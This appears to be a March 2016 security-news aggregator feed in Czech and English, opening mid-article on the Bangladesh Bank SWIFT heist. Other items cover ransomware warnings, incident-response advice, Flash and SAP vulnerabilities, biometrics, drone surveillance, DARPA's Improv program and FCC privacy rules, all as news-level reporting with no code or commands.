The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

In reality the hackers tried to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

What happened?

While investigators are collecting evidence on the alleged hack, security experts made some speculation on the incident. It is likely hackers breached Bangladesh Bank in early February stealing credentials for payment transfers, then they used the credentials to order transfers out of a Federal Reserve Bank of New York account held by Bangladesh Bank.

Anyway it is a complex hack, the attackers had a deep knowledge about Bangladesh Bank’s procedures for ordering transfers, likely they spied on Bangladesh Bank staff to gather the information.

Federal reserve New York hack

According to the Reuters, investigators believe hackers alleged used a malware to infect systems at the Bangladesh central bank. Two bank officials told to the Reuters that the attackers infiltrated the computer systems for weeks gathering information on the internal operation to use in the attack later.

“Investigators suspect that malicious software code, often referred to as malware, which allowed hackers to learn how to withdraw the money could have been installed several weeks before the incident, which took place between Feb. 4 and Feb. 5, said Bangladesh Bank officials briefed on the matter.” reported the Reuters.

The authorities hired the FireEye Inc’s Mandiant forensics division to investigate the cyber heist.

It is likely attackers have stolen the Bangladesh Bank’s credentials for the SWIFT messaging system, a network used by financial institutions and private corporates to authorize transfer financial transactions through a ‘financial message’.

“SWIFT and the Central Bank of Bangladesh are working together to resolve an internal operational issue at the central bank. SWIFT’s core messaging services were not impacted by the issue and continued to work as normal.” reads a statement issued on Friday by the SWIFT.

The incident could have serious repercussions on the way central banks worldwide operates, they need to review their processes and systems in order to prevent other attacks.


Pozor: Co při útoku hackerů nedělat!

13.3.2016 Hacking
Jak zjistit, že k útoku došlo? To dnes představuje nejtěžší otázku v oblasti informační bezpečnosti. Příběhy dlouhé roky neodhalených průniků a útoků se objevují prakticky neustále. Smutné pak je, že když se o průniku dozvíme, často jednáme nejhorším možným způsobem.

„Zamkněte dveře,“ nařídil letový ředitel NASA LeRoy Cain. „Nevypínejte počítače. Nikdo neopustí své místo. Nikdo nebude telefonovat. Zazálohujte všechna dostupná data, odložte své poznámky.“

Kalendář ukazoval 1. února 2003 a letový ředitel právě čelil nejhoršímu možnému scénáři, jaký si bylo možné představit: během přistávacího manévru se nad Texasem rozpadl raketoplán Columbia.

Ač Cainovi stékaly slzy z očí – na palubě stroje bylo sedm astronautů a šance přežít rozpad raketoplánu ve výšce 65 kilometrů při rychlosti 6,5 km za sekundu a obklopeném žhavou plazmou o teplotě několika tisíc stupňů Celsia byla nulová – zachoval si chladnou hlavu.

Postupoval přesně podle předem připravených plánů a zachránil všechna data uložená v počítačích, což později významně pomohlo zrekonstruovat průběh nehody.

Samozřejmě je velmi nepravděpodobné, že by někdo z nás jednou čelil podobné situaci. Na druhé straně si z ní každý z nás může odnést ponaučení při řešení bezpečnostních incidentů.

Obvykle nedostatky

Naším nejčastějším prohřeškem ve chvíli, kdy se „něco stane“, je to, že nemáme plán reakce (Incident Response, IR). Samozřejmě v takové chvíli už je pozdě na něj myslet, ale to je o důvod víc nachystat si jej dříve, než bude pozdě.

Když je jakýmkoliv způsobem bezpečnostní problém odhalený, často se ukáže, že není jasné, co se má dělat. Není stanovená osoba nebo tým, dokonce nebývá stanovený ani postup.

Většinou je pouze vyrozuměn pracovník IT oddělení, ale to se často děje jen jaksi automaticky. V případě absence „horké linky“ nemusí být navíc k zastižení.

Stejně tak nemusí vědět, co přesně má dělat (s informatikem, který vše řeší doporučením restartu, se asi setkal každý z nás). A navíc nemusí mít vůbec zájem incident nějak důkladně šetřit: vždyť incident může (ale samozřejmě také nemusí) ukázat na jeho osobní selhání.

Ostatně to není problém pouze IT pracovníků, i na úrovni organizací je často snaha incidenty „zametat pod koberec“ a zásadně nepřiznávat chybu.

Proto je nezbytně nutné mít alespoň základní plán zvládání bezpečnostních incidentů. Ovšem pozor: plán musí být funkční. Zatímco zhruba šedesát procent organizací jej má, praxe ale ukazuje, že zhruba dvě třetiny plánů v praxi nefungují.

Často se vytvoří, aby se učinilo zadost zadání nebo aby se zaplnila mezera identifikovaná během některého z nesčetných auditů. Byť to zní vznosně, plán zvládání bezpečnostních incidentů je čas od času potřeba prověřit ostrým cvičením. To odhalí drobnosti, které jinak zůstávají přehlédnuté.

Třeba jako v případě jisté newyorské nemocnice, která si bezpečnostní audit nechala zpracovat – konstatovalo se v něm, že záložní dieselové agregáty v suterénu nejsou šťastným nápadem a že v případě velké vody nebudou plnit svoji úlohu.

Nemocnice je proto přesunula do vyšších pater. Auditor byl spokojený, problém se zdál být odstraněný. Pak ale přišel říjen 2012 a udeřil hurikán Sandy. Až v tu chvíli nemocnice s hrůzou zjistila, že agregáty sice přesunula – ale nádrže s naftou zůstaly v zaplaveném suterénu...

Jeden problém navazuje na druhý

Často na bezpečnostní incident reagujeme odstraněním nalezeného malwaru (což je nejčastější forma incidentu), a útok tím máme za ukončený. Jenže...

Tím se připravujeme o stěžejní důkazy, které nám mohou hodně napovědět o tom, kudy se útočník dostal do systému, kdy se tak stalo, jaké byly jeho záměry a co všechno vlastně získal. Druhou chybou, kterou v takové chvíli děláme, je vypnutí počítačů. Tím přicházíme o logy, nenahraditelná data v paměti apod.

Předpokládejme vždy nejhorší možný scénář: útok profesionála. Ten pak těžko použije jeden vektor, v horším případě mu dokonce sednete na vějičku: nastrčí kód, u něhož chce, aby byl nalezený. Skutečné nebezpečí se pak skrývá jinde. Dobrý útočník zkrátka bývá dobře připravený.

Samozřejmě že nikdo nechce, abyste se s rukama v klíně dívali, jak vám útočník stahuje další a další data ze sítě. Ale odstřihnout ho můžeme i jinak než vytržením elektrické šňůry ze zásuvky.

Například aktivací přísných omezení na firewallu nebo převodem veškerého provozu do uzavřené VPN sítě. Útočník sice bude výpadkem datového toku varován, ale vy nepřijdete o cenné informace.

A především: získáte čas a budete se moci rozhlédnout po informačním systému, aby bylo možné zmapovat celou šíři útoku.

Známý je například případ jedné americké banky, kdy útočník umístil do systému škodlivý kód. Po jeho odhalení následoval hloubkový bezpečnostní audit, který zjistil, že útočník ve skutečnosti zanechal v systému přes 300 druhů různého malwaru. Jinými slovy: odhalení jednoho exempláře zabránilo mnohem většímu útoku.

Zatajit, nebo nezatajit?

Kolik IR plánů tedy instrukce týkající se krizové komunikace obsahují? Tedy to, koho, kdy a jak informovat – nebo kdo má právo hovořit. Pokud nás k tomu legislativa nenutí jinak, máme tendenci bezpečnostní incidenty utajovat. Jistá logika v tom je: následná panika může natropit více škody než vlastní incident.

Na druhé straně si pak informace mohou žít svým vlastním životem. „Informovat, či neinformovat“ tak představuje jedno ze zásadních dilemat informační bezpečnosti – ale i to se však dá do značné míry ošetřit v plánech reakce.


Experti bijí na poplach. Vyděračských virů v Česku dramaticky přibylo

13.3.2016 Viry
V posledních týdnech dramaticky narostl počet škodlivých e-mailů, prostřednictvím kterých šíří počítačoví piráti viry. Nejčastěji jde o vyděračské viry z rodiny tzv. ransomwarů. Podle bezpečnostních expertů ze společnosti Eset je Česká republika jednou z nejvíce zasažených zemí, kde se tito nezvaní

Jak se bránit vyděračským virům!

:: Neotvírejte přílohy e-mailových zpráv od neznámých a podezřelých adresátů.
:: Pravidelně zálohujte svoje data. V případě nákazy se počítač jednoduše přeinstaluje a zašifrovaná data se mohou obnovit i bez placení výkupného nebo nutnosti je odšifrovat.
:: Externí disky nebo jiné úložné systémy, na které jsou data zálohována, by neměly být neustále připojeny k počítači. Minimalizuje se tím riziko, že se vyděračský virus zabydlí i u zálohovaných dat.
:: Pravidelně aktualizujte operační systém i jiné programy. Znesnadníte tak práci počítačových pirátů, kteří se snaží objevené trhliny zneužít k propašování škodlivých kódů.
:: Nutné je také pravidelně aktualizovat antivirový program, případně jiné bezpečnostní aplikace.
:: Nepoužívejte programy, pro které již výrobce ukončil podporu. Hrozba nákazy například na Windows XP je mnohonásobně vyšší než u novějších verzí tohoto operačního systému.
„Virová nákaza se šíří prostřednictvím e-mailových zpráv, které obsahují přílohu ve formátu zip. Ta je nejčastěji označena jako faktura nebo pozvání k soudu. Tímto trikem se útočníci snaží oběť navést k tomu, aby otevřela obsah přílohy,“ prohlásil Petr Šnajdr, bezpečnostní expert společnosti Eset.

Podle něj se po otevření souboru nainstaluje do počítače škodlivý kód. Jde například o virus zvaný Nemucod, který se uhnízdí v počítači a může potom stahovat další nezvané návštěvníky.

Tento škodlivý kód začne šifrovat obsah počítače a uživateli oznámí, že za dešifrování musí zaplatit.
Petr Šnajdr, bezpečnostní expert společnosti Eset
Nejčastěji stahuje právě vyděračské viry. „Aktuálně stahuje především různé typy ransomware, například známý TeslaCrypt nebo Locky. Následně tento škodlivý kód začne šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit,“ dodává Šnajdr.

Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.

Používají stejné šifrování jako finanční instituce
Právě zmiňované dva programy totiž používají poměrně sofistikované šifrování. Jde o obdobu toho, co používají finanční instituce při zabezpečení plateb po internetu.

Právě před jedním ze zmiňovaných vyděračských virů varovala také bezpečnostní společnost Check Point. „Za pouhé dva týdny se Locky pokusil ohrozit uživatele ve více než 100 zemích,“ varoval mediální zástupce Check Pointu Petr Cícha.

„Kyberzločinci infikují systém e-mailem s wordovou přílohou, která obsahuje škodlivé makro. Jakmile uživatel soubor otevře, tak makro spustí skript, který stáhne spustitelný škodlivý soubor, nainstaluje se na počítač oběti a vyhledává soubory, které šifruje. Uživatel potom ani neví, že útok začal právě kliknutím na e-mailovou přílohu,“ doplnil Cícha.

Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu.


Hackerům se nepovedlo ukrást miliardu dolarů díky překlepu

13.3.2016 Incidenty
Hackerům se nepovedlo ukrást miliardu dolarů díky překlepuVčera, Milan Šurkala, aktualitaCesta k velkému bohatství může být občas ukončena velmi nepříjemným malým detailem. Hackeři dokázali nezákonně získat téměř miliardu dolarů, nicméně při stahování peněz na další účty udělali překlep, což jim naštěstí vše zkazilo.
Během 4. a 5. února 2016 se skupině hackerů patrně podařilo prolomit zabezpečení Bangladesh Bank a dostat se k téměř miliardě dolarů (hovoří se o zhruba 850-870 milionech). Tyto peníze pak převáděli přes různé banky na účty ve Filipínách a Srí Lance. Jen na Federal Reserve Bank přišly desítky žádostí na převody peněz. Povedly se jim čtyři přenosy, každý za zhruba 20 milionů dolarů. Uschovali si tedy lehce přes 80 milionů dolarů, nicméně pátý přenos jim už nevyšel.

Ten směřoval do Shalika Foundation ve Srí Lance, nicméně hackerům se povedlo splést název organizace a místo "Foundation" napsali "Fandation". Toho si všimla Deutsche Bank, přes kterou měly tyto peníze jít a zažádala o vysvětlení této podezřelé transakce, čímž se na celou záležitost přišlo. Bangladesh Bank se už povedlo některé z peněz získat zpátky a nyní chce žalovat Federal Reserve Bank za to, že dostatečně rychle nerozpoznala podezřelé transakce. Bangladesh Bank na situaci nedokázala rychle reagovat, neboť šlo o nepracovní dny.


Barack Obama chce opět backdoor v softwaru ze zákona

13.3.2016 Hrozby
Barack Obama chce opět backdoor v softwaru ze zákonaDnes, Milan Šurkala, aktualitaPoslední týdny se přetřásá kauza FBI a Applu, střídají se názory, zda má Apple odemknout mobil teroristů nebo nikoli. Americký prezident Barack Obama se v jednom rozhovoru zmínil, že zadní vrátka v softwaru by měla být povinná.
V jednom z rozhovorů s americkým prezidentem Barackem Obamou byl dotázán na názor ohledně kauzy FBI a Applu (zda má Apple odemknout mobil teroristy a zpřístupnit tak data pro FBI), ten se ale k tomuto případu nechtěl vyjadřovat. Přesto jeho reakce vcelku mířila právě na tento případ. Hovořil o tom, že nechce, aby vláda mohla prohlížet mobilní telefony, jak se jí zlíbí, ale zároveň podotknul, že neprolomitelné šifrování v uživatelském sektoru je obrovský problém.

Důvodem je např. to, jak by při neprolomitelném šifrování mohly bezpečnostní složky odhalit např. dětskou pornografii, teroristické plány nebo třeba daňové úniky. Už zde je jasné, že chce monitorování ve velkém rozsahu. Dle Obamy by software měl mít zadní vrátka (backdoor), která by umožňovala vybraným lidem dostat se do každého zařízení a chce dosáhnout nějakého kompromisu. Cílem je, aby tento klíč mělo co nejméně lidí, nicméně i tak je rozhodně docela zvláštní využívat nejpokročilejší šifrovací systémy, když víte, že venku je pár lidí, kteří znají klíč "ze zákona". Šifra s klíčem v rukou vlády ale těžko bude "kompromisní". Připomeňme, že soud Apple versus FBI bude už 22. března a už v minulém roce vydal Obama vyhlášku, která nařizuje sdílení dat s vládou.


Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítače

13.3.2016 Zranitelnosti
Adobe updatuje Flash, kritická chyba dovolovala ovládnutí počítačeDnes, Milan Šurkala, aktualitaKdysi velmi populární Flash se pomalu opouští a není divu. Vedle nepříliš dobrého výkonu má také spoustu bezpečnostních chyb. Poslední update opravuje např. chybu CVE-2016-1010, která dovolila útočníkům převzít kontrolu nad počítačem.
Adobe Flash je čím dál v menší oblibě. Prvně je nahrazován HTML5, za druhé přináší spoustu bezpečnostních děr a poslední aktualizace (např. 21.0.0.182 pro Windows a Mac OS) opravuje celkem 23 bezpečnostních chyb, z nichž mnohé byly označeny jako kritické. Např. chyba CVE-2016-1010 dovolila převzít kontrolu nad počítačem a to se týkalo i mnoha dalších. Navíc jsou známy případy, kdy tato chyba byla využita ke skutečným útokům.

Společnost Adobe tedy doporučuje urychlený update na nejnovější verze tohoto přehrávače napříč všemi platformami. Týká se to tedy Windows, Mac OS, Linuxu i verzí pro mobilní telefony a jejich operační systémy.


Biometrie na vzestupu: Co všechno vám už dnes může přinést?

13.3.2016 Zabezpečení
Biometrické zabezpečení zažívá strmý růst. Je to z velké části i kvůli tomu, že mnoha mobilním uživatelům vyhovuje pohodlnost používání nástrojů, jako je identifikace otiskem prstu. Bude však hrát biometrie významnou roli také v řešeních podnikového zabezpečení?

Bezpečnostní experti upozorňují, že biometrické technologie mají pozitiva i negativa. Na straně pozitiv je biometrie efektivním způsobem prokazování skutečné identity jednotlivých uživatelů.

„Nejviditelnější výhodou je, že se dokazuje identita osoby s větší mírou jistoty,“ tvrdí Jason Taule, ředitel zabezpečení ve firmě FEI Systems, která je poskytovatelem technologických produktů pro zdravotnictví.

„Předpokladem ovšem je, že se biometrie použije v kombinaci s něčím, co tento člověk zná. To je velmi důležité v situacích, kdy dochází k přístupu k systémům a prostředkům vyšší úrovně citlivosti,“ dodává Taule.

S využitím biometrie „víte, že jednotlivec přistupující k zabezpečeným oblastem či informacím je nejen osobou disponující odpovídajícími přihlašovacími údaji, ale je to skutečně osoba, které se přístup udělil“, říká Maxine Most, ředitel společnosti Acuity Market Intelligence. „To zlepšuje zabezpečení a poskytuje to kontrolní záznam.“

Biometrie může také poskytnout větší komfort. „Přestože existují jasné rozdíly mezi různými variantami biometrie (například otisky prstů versus skenování duhovky), výhodou využití této technologie pro autentizaci je skutečnost, že osoba nemůže tento identifikátor zapomenout, jako se to může například stát u hesla, ani ho nemůže někde nechat nebo jí ho někdo nemůže ukrást, jako se to může stát u tokenu,“ popisuje Taule.

To podle něj přináší snížení nároků na linku technické podpory a potenciálně úspory v oblasti nákladů na zaměstnance.

Na rozdíl od metod založených na heslech poskytuje biometrie „silnou autentizaci“, kterou nelze později popírat při soudním sporu, tvrdí Taule. V závislosti na způsobu implementace systému existuje možnost využít biometrii pro ověření totožnosti při vstupu do budovy nebo k autoritě, která poté umožní přístup k dalším zdrojům.

Biometrie může při správném využití „vyřešit mnoho problémů s pouhým využitím uživatelské identifikace a hesel“, tvrdí Mary Chaneyová, hlavní vedoucí týmu správy dat a reakce na incidenty ve finanční instituci GE Capital.

„Pokud použijete dynamické behaviorální biometrické rozpoznávání, jako je například dynamika úhozu do kláves, můžete získat výhodu dvoufaktorové autentizace,“ popisuje Chaneyová.

Použití dynamiky stisků kláves umožňuje organizacím měřit u každé osoby dobu stisku kláves a dobu mezi stiskem dalších kláves, říká Chaneyová a dodává: „Při tomto scénáři poskytuje pouhé zadání hesla dvoufaktorovou autentizaci.“

Kromě toho je podle ní dynamika stisků kláves velmi přesná a není pro uživatele rušivá, což jsou dva z největších problémů při používání biometrie při jakékoli implementaci zabezpečení.

Nesnadné zneužití

Dalším velkým přínosem použití biometriky je, že se velmi těžce falšuje, tvrdí Chaneyová. Při měření obou (fyziologických a dynamických) údajů se zaznamenávají informace pro každou osobu jedinečné a v průběhu času se málokdy mění.

Při správné implementaci není třeba v některých případech nic dalšího dělat, ani si pamatovat. Ztracená ID a zapomenutá hesla budou minulostí, říká Chaneyová.

Protože je osobní údaje nesmírně obtížné padělat, „mohly by se biometrické identifikátory používat k usnadnění jak fyzického přístupu, například v určitých oblastech podnikového areálu, tak i k virtuálnímu přístupu k vybraným místům v podnikovém intranetu“, uvádí Windsor Holden, šéf výzkumu v analytické firmě Juniper Research.

„Tato přihlášení lze přímo propojit s konkrétní aktivitou, takže v případě narušení bezpečnosti v rámci organizace lze rychle identifikovat odpovědnou osobu,“ říká Holden.

Biometrii lze také použít k integraci BYOD (využívání osobních zařízení pro firemní účely) do podnikových bezpečnostních strategií, „protože tak dochází k propojení osob a přístupu pomocí jejich osobních mobilních zařízení“, vysvětluje Most.

Prozatímní negativa

Na straně negativ stále figurují dvě velké nevýhody biometrie – vysoká cena a obavy o zachování soukromí, uvádějí experti...


Typos stopped hackers stealing $1bn from Federal Reserve Bangladesh account
13.3.2016 Hacking

Hackers who allegedly infiltrated the Federal Reserve Bangladesh’s account were attempting to steal almost $1 billion, but typos thwarted the plan.
This week the principal news agencies shared the news of the hack of the Bangladesh account at the Federal Reserve Bank of New York.

The Bangladesh’s Finance Minister Abul Maal Abdul Muhith accused the U.S. Federal Reserve of the theft of at least $81 million stolen from the Bangladesh’s account. The Government of the Bangladesh is threatening the US for a legal fight to retrieve the funds, explained Muhith in a press conference held in Dhaka on Tuesday.

The central bank of Bangladesh declared the funds had been stolen from an account by hackers, the experts had traced some of the missing funds in the Philippines.

In reality the hackers tried to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided by accident because the bank’s security systems and typos in some requests allowed the identification of the theft attempts, investigators discovered that hackers failed 35 transfer attempts.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends, the operation started on a Friday because the Bangladesh Bank is closed, on the following days, Saturday and Sunday, the Fed Bank in New York was being closed.

Federal reserve New York hack

The choice of the Philippines as the landing country for the bank transfers was not casual, banks were also closed on the Monday due to the Chinese New Year.

While the central bank of Bangladesh is blaming Chinese hackers, the Fed is denying the security breach of security took place.

On Monday, a spokeswoman for the US Federal Reserve Bank of New York confirmed there was no evidence of a security breach, neither that the Bangladesh Bank account had been hacked.

Currently, the US Fed and the Bangladesh Government are still investigating the incident.

The Federal Reserve Bank of New York wrote still continues to deny any evidence of attempts to hack into the Federal Reserve systems:


The Pentagon used military drones for domestic surveillance
13.3.2016 IT

A report published by the DoD Inspector General revealed that military drones have been used for Non-Military domestic Surveillance.
The US Government has admitted the use of drones for operations of domestic surveillance. The US Military clarified that all the operations were authorized by a regular warrant confirming that no legal violations were found.

The news was revealed by the USA Today that obtained it with a Freedom of Information Act request. A report issued by the Inspector General at US DoD states the that less than 20 missions have been flown by military spy drones on non-military missions between 2006 and 2015.

The inspector general analysis was completed March 20, 2015, but the authorities released it recently.

“The Pentagon has deployed drones to spy over U.S. territory for non-military missions over the past decade, but the flights have been rare and lawful, according to a new report” states the USA Today.

The DoD report revealed the Pentagon established interim guidance in 2006 governing when and whether the drones could be used for domestic surveillance missions.

“The interim policy allowed spy drones to be used for homeland defense purposes in the U.S. and to assist civil authorities.” continues the post.

The policy highlights that any use of military drones for civil authorities had to be approved by the Secretary of Defense or someone delegated by the secretary.

The US government won’t disclose the details of non-military spying missions flown by the drones, anyway it has publicly issued a list of nine operations conducted between 2011 and 2016:

“The Pentagon has deployed drones to spy over U.S. territory for non-military missions over the past decade, but the flights have been rare and lawful, according to a new report” states the USA Today.
The DoD report revealed the Pentagon established interim guidance in 2006 governing when and whether the drones could be used for domestic surveillance missions.

“The interim policy allowed spy drones to be used for homeland defense purposes in the U.S. and to assist civil authorities.” continues the post.

The policy highlights that any use of military drones for civil authorities had to be approved by the Secretary of Defense or someone delegated by the secretary.

The US government won’t disclose the details of non-military spying missions flown by the drones, anyway it has publicly issued a list of nine operations conducted between 2011 and 2016:

DoD operations of domestic surveillance

The US Military seems to have refused to provide the entire archive related to civic requests for the military drone usage for domestic surveillance.

“The report quoted a military law review article that said “the appetite to use them (spy drones) in the domestic environment to collect airborne imagery continues to grow, as does Congressional and media interest in their deployment.”” continues the USA Today.

US drones domestic survellaince
Source: USA Today

Let’s close reminding that the domestic surveillance with drones is allowed with the explicit authorization by the defense secretary.

The USA today confirmed that shortly before the DoD Inspector General report was completed, the Pentagon issued a new policy governing the use of spy drones. The policy requires the defense secretary to approve every single domestic surveillance mission relying on drones.

The report states the drones “may not conduct surveillance on U.S. persons” and bans the use of armed drones over the United States.


DARPA Improv program, weaponizing the off-the-shelf electronics
13.3.2016 IT

The Defense Advanced Research Projects Agency is launching a new project dubbed Improv that aims to develop new techniques to hack into everyday technology.
The IoT paradigm is enlarging as never before our surface of attack, it is obvious that cyber criminals and nation-state hackers are looking at it with an increasing interest.
The US Military Defense Advanced Research Projects Agency (DARPA) is asking American geeks to develop new techniques to turn everyday IoT objects into cyber weapons.

The DARPA is launching a new project dubbed Improv that aims to develop new techniques to hack into everyday technology.

The DARPA’s intent it to involve researchers, industry vendors, and hobbyists in finding new attack vectors for embedded devices and consumer technology.

IoT technology is being wide adopted in various industries, including transportation, healthcare and home automation. DARPA is particularly interested in off-the-shelf technology that could be abused by malicious attackers to cause damage on a large scale.

The Improv project aims to discover new attack vector targeting “easily purchased, relatively benign technologies.”

“The Defense Advanced Research Projects Agency (DARPA) Improv program is soliciting innovative research proposals for prototype products and systems that have the potential to threaten current military operations, equipment, or personnel and are assembled primarily from commercially available technology.” reads the Synopsis of the Improv program.

“Improv will explore ways to combine or convert commercially available products such as off-the-shelf electronics, components created through rapid prototyping, and open-source code to cost-effectively create sophisticated military technologies and capabilities.” explained the program manager John Main.

“To bring a broad range of perspectives to bear, DARPA is inviting engineers, biologists, information technologists and others from the full spectrum of technical disciplines—including credentialed professionals and skilled hobbyists—to show how easily-accessed hardware, software, processes, and methods might be used to create products or systems that could pose a future threat. “

“Improv is being launched in recognition that strategic surprise can also come from more familiar technologies, adapted and applied in novel ways.”

In the first phase of the Improv program, DARPA will accept submissions from the public on possible attack techniques relying on easily-available technologies.

The DARPA will select most interesting projects that will be supported by the agency in various ways, including economic funding.

DARPA Improv program off-the-shelf electronics
“DARPA will assess candidate ideas and offer varying levels of support to develop and test selected proposals. The emphasis will be on speed and economy, with the goal of propelling winning submissions from concept to simple working prototypes within about 90 days.” states the DARPA

The Improv will help the US Military to identify possible attack vectors of potential cyber threats, but many experts believe that the US Government is also thinking about new attack vectors to maintain it supremacy in the cyberspace.

“DARPA often looks at the world from the point of view of our potential adversaries to predict what they might do with available technology,” said Main.

“Historically we did this by pulling together a small group of technical experts, but the easy availability in today’s world of an enormous range of powerful technologies means that any group of experts only covers a small slice of the available possibilities.”

If you are interested in the project follow the special webinar issued by the DARPA on March 29 and 30.


Flash opět obsahuje kritické chyby, podle Adobe je už používají útočníci

12.3.2016 Zranitelnosti

Firma vydala mimořádné opravy více než dvacítky chyb, řada z nich je kritických, takže potenciálním útočníkům umožňují získat vládu nad systémem.
Není to velké překvapení – tím by spíš bylo, kdyby Flash vydržel delší dobu bez zásadních bezpečnostních incidentů. Adobe aktuálně doporučuje aktualizovat Flash Player na nejnovější verzi – pokud tak neučiníte, vystavujete se riziku napadení svého zařízení.

Jednu z chyb už podle firmy útočníci využívají. „Adobe má informace o tom, že chyba CVE-2016–1010 je aktivně zneužívána v omezeném počtu cílených útoků,“ přiznává na svém blogu.

Zatím neupřesněná chyba podle firmy může vést k tomu, že útočník bude schopný na zařízení spouštět svůj kód.

Adobe tak doporučuje updatovat Flash Player na verzi 21.0.0.182 (Windows a Mac), respektive 11.2.202.577 (Linux). Pokud ovšem Flash Player ve svém zařízení nutně nepotřebujete, je nejlepší jej úplně odinstalovat.

Flash je tak jako tak na ústupu. Google nedávno oznámil, že jeho reklamní systémy od léta přestanou přijímat flashové bannery, jeho podporu omezují i prohlížeče a v mobilních zařízeních si beztak ani neškrtne.


How a Typo Stopped Hackers from Stealing $1 Billion from Bank
12.3.2016 Hacking
Typos are really embarrassing, but this time it saved the Bangladesh Central Bank and the New York Federal Reserve by preventing a nearly $1 Billion (£700 Million) heist.
Last month, some unknown hackers broke into Bangladesh's central bank, obtained credentials needed for payment transfers and then transfer large sums to fraudulent accounts based in the Philippines and Sri Lanka. But…
A single spelling mistake in an online bank transfer instruction prevented the full theft, according to Reuters.
Here’s what actually was happened:
Nearly three dozen requests hit the Federal Reserve Bank of New York on 5 February using the Bangladesh Bank's SWIFT code, out of which four resulted in successful transfers, for a total value of about $81 million.
However, when the hackers attempted to make their fifth transfer of $20 Million to a Sri Lankan non-governmental organization called the Shalika Foundation, they made a typo by attempting a transfer to the Shalika "Fandation."
Staff at Deutsche Bank, which was involved in routing funds, spotted this spell error and got asked the Bangladeshis for clarification on the typo. The Bangladesh bank then canceled the remaining transfers.
The Federal Reserve Bank of New York also queried the Bangladesh central bank after spotting the large number of transfer of funds to private accounts at around the same time.
The hackers, who are still unknown, had been attempting to steal a further $850 Million from the Bangladesh government’s reserve account, but typo in the requests prevented the full theft.
The $81 Million of transfer that was successfully made has not been recovered, but the typo saved the Bangladeshis because if all the fund transfers were made successfully thieves would have made off with $950 Million.
The attack happened between February 4 and 5 and originated from outside the country. Moreover, the hackers are still unknown and officials said there is not much hope of catching them.
Meanwhile, the Bangladesh central bank says the Federal Reserve should have stop the transactions. The bank is planning to file a lawsuit against the Federal Reserve in order to recover some of the funds that were lost.


ISPs Sell Your Data to Advertisers, But FCC has a Plan to Protect Privacy
12.3.2016 Hacking
FCC wants ISPs to get customer permission before sharing personal data
The Federal Communication Commission (FCC) has put forward a proposal that aims to protect Internet user's privacy.
The proposal [pdf] will regulate the amount of customers’ online data the Internet Service Providers (ISPs) are able to collect and sell to the advertising companies.
Currently, there is no particular rule by law covering broadband providers and customer privacy, and if adopted, this would be the first privacy rule for ISPs.
The FCC already governs how phone companies can use and resell customer data, and the Chairman Tom Wheeler believes similar rules should be applied to ISPs.
Is Your ISP Tracking Your Web Surfing and Selling Data to Advertisers?
Your complete Internet traffic passes through your Internet Service Provider, which gives it the ability to access to vast and potentially lucrative amount of your web-browsing activity.
If you are using a mobile phone, your ISP can also track your physical location throughout the day in real time.
ISPs are using Deep packet inspection to stealthily gather and store information about their customers’ surfing habits – including:
Search queries
Web sites visited
Information entered
What apps they use
…and then later Advertising companies serve advertisements based on those behaviors.
The proposed set of rules include a requirement that ISPs clearly disclose what data they collect on their users, and share that collected data with other companies for advertisements, marketing or other purposes.
The rules will not prohibit ISPs from using the personal data they collect from their users, "only that since it is your information, you should decide whether they can do so," FCC Chairman Tom Wheeler wrote. "This isn’t about prohibition; it’s about permission."
The proposed rules will be debated during the FCC's March 31 meeting, and if approved would go out for public comment.
The proposal would create some of the strongest privacy regulations and give consumers control over how ISPs can use their data.


SAP Download Manager flaw exposed user password
11.3.2016 Vulnerebility

An attacker who manages to get access to a user’s configuration file for SAP Download Manager might be able to obtain the stored proxy password.
Are you a SAP user? Do you use the SAP Download Manager that allows downloading of software packages and support notes? You urgently need to update it in order to fix a serious vulnerability that could be exploited to expose your password.

According to experts at Core Security, a local attacker who is able to access the user’s configuration file in SAP Download Manager might be able to obtain the stored proxy password.

“SAP Download Manager [1] is a Java application offered by SAP that allows downloading software packages and support notes. This program stores the user’s settings in a configuration file. Sensitive values, such as the proxy username and password if set, are stored encrypted using a fixed static key” states the security advisory published by Core Security.

The flaw affects the SAP Download Manager version up to 2.1.142 (released in October 2015), but experts at Core Security haven’t tested other products and versions.

“SAP system and BASIS administrators often use the SAP Download Manager program to download software packages and fixes. We found that this program stores credentials information on the local user’s directories using an encryption mechanism that can be easily bypassed.” said Core Security Consulting Services’ Martin Gallo who discovered the flaw.

“While recent versions of the program had stopped storing SAP’s Marketplace credentials, proxy authentication information is still kept on the program’s configuration file. This represents a risk on the enterprise environment where proxy authentication is integrated with other systems, for example using Active Directory’s credentials, if the configuration file is compromised,”

It is important to highlight that the SAP application implements encrypted storage of sensitive values, however some sensitive values, such as the user’s proxy password are stored with weak encryption.

SAP published the Security Note 2282338 accessible to its customers only.

The researchers at Core Security also published a proof of concept exploit code that is included in the advisory.

SAP has already fixed the problem and issued a new updated software this week.


Českem se masivně šíří maily s virovou nákazou a šifrující počítač

11.3.2016 Viry
Ransomware Nemucod se distribuuje jako příloha elektronické pošty, jež se nejčastěji označuje jako faktura nebo pozvání k soudu.

Mimořádný nárůst počtu škodlivých e-mailů obsahujících virovou přílohu zaznamenal Eset. Při jejím otevření se podle jeho expertů do zařízení nainstaluje ransomware, což je škodlivý kód, který zašifruje obsah počítače a za jeho odšifrování požaduje výkupné.

Tato virová nákaza – známá jako JS/TrojanDownloader.Nemucod -- se šíří po celém světě, Česká republika je však prý jednou z nejvíce zasažených zemí.

